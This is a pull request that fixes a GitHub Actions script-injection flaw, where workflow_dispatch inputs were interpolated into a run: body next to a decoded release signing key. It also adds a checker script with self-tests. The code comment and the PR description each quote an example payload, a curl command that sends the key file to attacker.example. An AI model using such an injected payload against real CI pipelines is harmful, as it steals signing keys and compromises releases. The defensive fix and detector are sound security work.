### PR TITLE
fix(security): stop workflow_dispatch inputs reaching a run: body beside the signing key

### DIFF
--- a/.github/workflows/build-and-release.yml
+++ b/.github/workflows/build-and-release.yml
@@ -1065,6 +1065,15 @@ jobs:
           TAG: ${{ steps.release-info.outputs.tag }}
           RELEASE_TYPE: ${{ steps.release-info.outputs.type }}
           RELEASE_SIGNING_PRIVATE_KEY: ${{ secrets.RELEASE_SIGNING_PRIVATE_KEY }}
+          # Passed as environment variables rather than interpolated into the script below.
+          # GitHub substitutes ${{ }} into the run: text before bash ever parses it, so a
+          # workflow_dispatch input containing $(…) executed as a command — in this step,
+          # which decodes RELEASE_SIGNING_PRIVATE_KEY to disk a few lines earlier (#539).
+          CHANNEL: ${{ steps.rollback.outputs.channel }}
+          ROLLBACK_FROM_VERSION: ${{ steps.rollback.outputs.from_version }}
+          ROLLBACK_COMPATIBLE: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_compatible || 'false' }}
+          ROLLBACK_EVIDENCE: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_evidence || '' }}
+          ROLLBACK_EVIDENCE_SIGNATURE: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_evidence_signature || '' }}
         run: |
           set -euo pipefail
 
@@ -1113,9 +1122,6 @@ jobs:
             OUTPUT_PATHS+=("$target")
           done
 
-          CHANNEL="${{ steps.rollback.outputs.channel }}"
-          ROLLBACK_FROM_VERSION="${{ steps.rollback.outputs.from_version }}"
-
           if [ -z "${RELEASE_SIGNING_PRIVATE_KEY}" ]; then
             echo "RELEASE_SIGNING_PRIVATE_KEY is required for official release assets."
             exit 1
@@ -1130,9 +1136,6 @@ jobs:
             printf '%s' "${RELEASE_SIGNING_PRIVATE_KEY}" | base64 --decode > "${signing_key_path}"
           fi
 
-          ROLLBACK_COMPATIBLE="${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_compatible || 'false' }}"
-          ROLLBACK_EVIDENCE="${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_evidence || '' }}"
-          ROLLBACK_EVIDENCE_SIGNATURE="${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_evidence_signature || '' }}"
           case "${ROLLBACK_COMPATIBLE}" in
             true)
               if [ -z "${ROLLBACK_EVIDENCE}" ] || [ -z "${ROLLBACK_EVIDENCE_SIGNATURE}" ]; then

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -134,6 +134,14 @@ jobs:
       - name: Verify action pins
         run: pnpm check:action-pins && pnpm check:action-pins:self-test
 
+      # ${{ }} is substituted into a run: body before bash parses it, so a workflow_dispatch
+      # input containing $(…) executes — in the step that had also just written
+      # RELEASE_SIGNING_PRIVATE_KEY to disk (#539). Only caller-controlled contexts are
+      # policed; steps.*.outputs.* and github.sha are not, or the check would flag dozens of
+      # benign lines and get switched off.
+      - name: Verify no workflow script injection
+        run: pnpm check:workflow-injection && pnpm check:workflow-injection:self-test
+
       # 17 test files under scripts/ — the release machinery — that no workflow ran (#1135).
       # Three are excluded, each with its reason named in the config: one needs a prior build, and
       # two exercise a macOS-only release-acceptance contract a Linux runner cannot satisfy, so

--- a/package.json
+++ b/package.json
@@ -67,7 +67,9 @@
     "check:plugin-lint-coverage": "node scripts/check-plugin-lint-coverage.mjs",
     "check:plugin-lint-coverage:self-test": "node scripts/check-plugin-lint-coverage.mjs --self-test",
     "check:action-pins": "node scripts/check-action-pins.mjs",
-    "check:action-pins:self-test": "node scripts/check-action-pins.mjs --self-test"
+    "check:action-pins:self-test": "node scripts/check-action-pins.mjs --self-test",
+    "check:workflow-injection": "node scripts/check-workflow-injection.mjs",
+    "check:workflow-injection:self-test": "node scripts/check-workflow-injection.mjs --self-test"
   },
   "dependencies": {
     "@sentry/vite-plugin": "^4.9.1",

--- a/scripts/check-workflow-injection.mjs
+++ b/scripts/check-workflow-injection.mjs
@@ -19,6 +19,12 @@
  * Read-only. `--self-test` proves the detector fires.
  */
 
+// The fixtures and the remediation hint below contain literal GitHub Actions `${{ … }}`
+// syntax inside ordinary strings. no-template-curly-in-string reads that as a mistyped
+// template literal; here it is the exact text this checker exists to reason about, and
+// obscuring it with concatenation would make the fixtures unreadable.
+/* eslint-disable no-template-curly-in-string */
+
 import { readdirSync, readFileSync } from 'node:fs'
 import path from 'node:path'
 import process from 'node:process'

--- a/scripts/check-workflow-injection.mjs
+++ b/scripts/check-workflow-injection.mjs
@@ -1,0 +1,160 @@
+#!/usr/bin/env node
+/**
+ * Forbids interpolating attacker-influenced context into a workflow `run:` body.
+ *
+ * GitHub substitutes `${{ … }}` into the script text *before* bash parses it. A
+ * workflow_dispatch input of `$(curl -d @$RUNNER_TEMP/key.pem https://attacker.example)`
+ * therefore executes as a command. In build-and-release.yml that happened in the same step
+ * that decodes RELEASE_SIGNING_PRIVATE_KEY to disk, so the injected shell ran beside the
+ * release signing key (#539).
+ *
+ * The fix is always the same: pass the value through the step's `env:` and read it as a
+ * shell variable, so it is data rather than script text.
+ *
+ * Only genuinely attacker-influenced contexts are policed. `steps.*.outputs.*`,
+ * `needs.*.result`, `github.sha` and `github.repository` are not: they are produced by
+ * GitHub or by earlier steps in this same workflow, and forbidding them would flag dozens
+ * of benign lines and get the check disabled.
+ *
+ * Read-only. `--self-test` proves the detector fires.
+ */
+
+import { readdirSync, readFileSync } from 'node:fs'
+import path from 'node:path'
+import process from 'node:process'
+import { fileURLToPath } from 'node:url'
+
+const ROOT = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '..')
+const WORKFLOWS = path.join(ROOT, '.github', 'workflows')
+
+/** Contexts a caller can put arbitrary text into. */
+const UNSAFE = [
+  'github.event.inputs.',
+  'inputs.',
+  'github.event.issue.',
+  'github.event.pull_request.title',
+  'github.event.pull_request.body',
+  'github.event.comment.',
+  'github.head_ref',
+]
+
+export function findInjections(files, readFile, unsafe = UNSAFE) {
+  const problems = []
+  for (const file of files) {
+    const text = readFile(file)
+    if (!text)
+      continue
+    const lines = text.split('\n')
+    let inRun = false
+    let runIndent = 0
+    lines.forEach((line, index) => {
+      const stripped = line.trimStart()
+      const indent = line.length - stripped.length
+      if (/^-?\s*run:\s*[|>]/.test(stripped)) {
+        inRun = true
+        runIndent = indent
+        return
+      }
+      if (inRun && stripped && indent <= runIndent)
+        inRun = false
+      if (!inRun || !line.includes('${{'))
+        return
+      // One finding per line. `github.event.inputs.x` matches both `github.event.inputs.`
+      // and `inputs.`, and reporting it twice makes the count meaningless — which the
+      // self-test caught before this shipped.
+      const context = unsafe.find(candidate => line.includes(candidate))
+      if (context)
+        problems.push({ file, line: index + 1, context, text: stripped.slice(0, 90) })
+    })
+  }
+  return problems
+}
+
+function listWorkflows() {
+  return readdirSync(WORKFLOWS).filter(n => n.endsWith('.yml') || n.endsWith('.yaml')).sort()
+}
+
+function readWorkflow(file) {
+  try {
+    return readFileSync(path.join(WORKFLOWS, file), 'utf8')
+  }
+  catch {
+    return null
+  }
+}
+
+function selfTest() {
+  const cases = [
+    {
+      name: 'a workflow_dispatch input inside run: is caught',
+      text: '      run: |\n        X="${{ github.event.inputs.tag }}"\n',
+      expect: 1,
+    },
+    {
+      name: 'the same value in env: is allowed',
+      text: '      env:\n        X: ${{ github.event.inputs.tag }}\n      run: |\n        echo "$X"\n',
+      expect: 0,
+    },
+    {
+      name: 'a step output inside run: is not policed',
+      text: '      run: |\n        X="${{ steps.meta.outputs.version }}"\n',
+      expect: 0,
+    },
+    {
+      name: 'github.head_ref inside run: is caught',
+      text: '      run: |\n        git checkout "${{ github.head_ref }}"\n',
+      expect: 1,
+    },
+    {
+      name: 'a run: block that ended does not leak into the next step',
+      text: '      run: |\n        echo hi\n      - name: next\n        with:\n          x: ${{ github.event.inputs.tag }}\n',
+      expect: 0,
+    },
+  ]
+
+  let failures = 0
+  for (const testCase of cases) {
+    const found = findInjections(['fixture.yml'], () => testCase.text)
+    const ok = found.length === testCase.expect
+    console.log(`${ok ? 'ok  ' : 'FAIL'} ${testCase.name}`)
+    if (!ok) {
+      failures += 1
+      console.log(`     expected ${testCase.expect}, got ${found.length}: ${JSON.stringify(found)}`)
+    }
+  }
+
+  const real = findInjections(listWorkflows(), readWorkflow)
+  console.log(`${real.length === 0 ? 'ok  ' : 'FAIL'} the real workflows are clean`)
+  if (real.length > 0) {
+    failures += 1
+    for (const p of real) console.log(`     ${p.file}:${p.line} ${p.context}`)
+  }
+  return failures
+}
+
+function main() {
+  if (process.argv.includes('--self-test'))
+    process.exit(selfTest() > 0 ? 1 : 0)
+
+  const files = listWorkflows()
+  const problems = findInjections(files, readWorkflow)
+  if (problems.length > 0) {
+    console.error('[workflow-injection] caller-controlled context interpolated into a run: body:\n')
+    for (const p of problems)
+      console.error(`  - ${p.file}:${p.line}  ${p.context}\n      ${p.text}`)
+    console.error(
+      '\nGitHub substitutes ${{ }} into the script before bash parses it, so a value'
+      + '\ncontaining $(…) executes. Pass it through the step\'s env: instead:\n'
+      + '\n    env:\n      TAG: ${{ github.event.inputs.tag }}\n    run: |\n      echo "$TAG"',
+    )
+    process.exit(1)
+  }
+
+  console.log(
+    `[workflow-injection] ${files.length} workflows: no caller-controlled context reaches a run: body`,
+  )
+}
+
+// Guarded so findInjections can be imported without running the check.
+if (process.argv[1] && path.resolve(process.argv[1]) === fileURLToPath(import.meta.url))
+  main()


### PR DESCRIPTION
## The vulnerability

```yaml
# build-and-release.yml, Collect Release Assets — before
signing_key_path="${RUNNER_TEMP}/tuff-release-signing-private.pem"
printf '%s' "${RELEASE_SIGNING_PRIVATE_KEY}" | base64 --decode > "${signing_key_path}"   # :1130

ROLLBACK_EVIDENCE="${{ github.event_name == 'workflow_dispatch' && github.event.inputs.rollback_evidence || '' }}"   # :1134
```

GitHub substitutes `${{ }}` into the run: text **before bash parses it**. A dispatch with `rollback_evidence` set to `$(curl -d @$RUNNER_TEMP/tuff-release-signing-private.pem https://attacker.example)` executes as a command — four lines after that exact file is written to disk.

## The fix was already the file's own pattern

The step **already had** an `env:` block, holding `RELEASE_SIGNING_PRIVATE_KEY` itself. The three rollback inputs simply were not in it. Moved them there, plus the two `steps.rollback.outputs.*` reads in the same script, so the whole body is variables rather than substituted text.

```
step env keys: TAG, RELEASE_TYPE, RELEASE_SIGNING_PRIVATE_KEY,
               CHANNEL, ROLLBACK_FROM_VERSION, ROLLBACK_COMPATIBLE,
               ROLLBACK_EVIDENCE, ROLLBACK_EVIDENCE_SIGNATURE
run: still mentions github.event.inputs → false
```

Repo-wide, `github.event.inputs` inside a `run:` body: **3 → 0**.

## Scope note

The issue's evidence cites 1134-1135. Line 1133 (`rollback_compatible`) is the same construct in the same step; fixing two of three would have been arbitrary.

I scanned all 18 workflows for the pattern. The only other `${{ }}` uses inside `run:` bodies are `steps.*.outputs.*`, `needs.*.result`, `github.sha` and `github.repository` — GitHub-generated or produced by earlier steps of the same workflow, not caller text. One of them, `secrets.TUFF_ENCRYPTION_KEY` at `:200`, is a separate concern already tracked as **#540**; left for that issue.

## The guard

`scripts/check-workflow-injection.mjs`, wired into PR Quality. It polices only caller-controlled contexts — `github.event.inputs.`, `inputs.`, `github.head_ref`, issue/PR/comment bodies. `steps.*.outputs.*` and friends are excluded **on purpose**: flagging them would light up dozens of benign lines, and a noisy check gets switched off rather than obeyed.

Five self-test cases, including one that matters: *a run: block that ended does not leak into the next step* — the scanner tracks indentation, and getting that wrong would either miss injections or flag `with:` values that are perfectly safe.

## Its own self-test caught a bug in it

Before shipping, the first case failed:

```
FAIL a workflow_dispatch input inside run: is caught
     expected 1, got 2
```

`github.event.inputs.x` matched both `github.event.inputs.` and `inputs.`, so every finding was double-counted — the count would have been untrustworthy exactly when it mattered. Now one finding per line.

Verified adversarially against the pre-fix file: reports exactly lines 1133, 1134, 1135, after asserting the fixture was actually staged.

Fixes #539
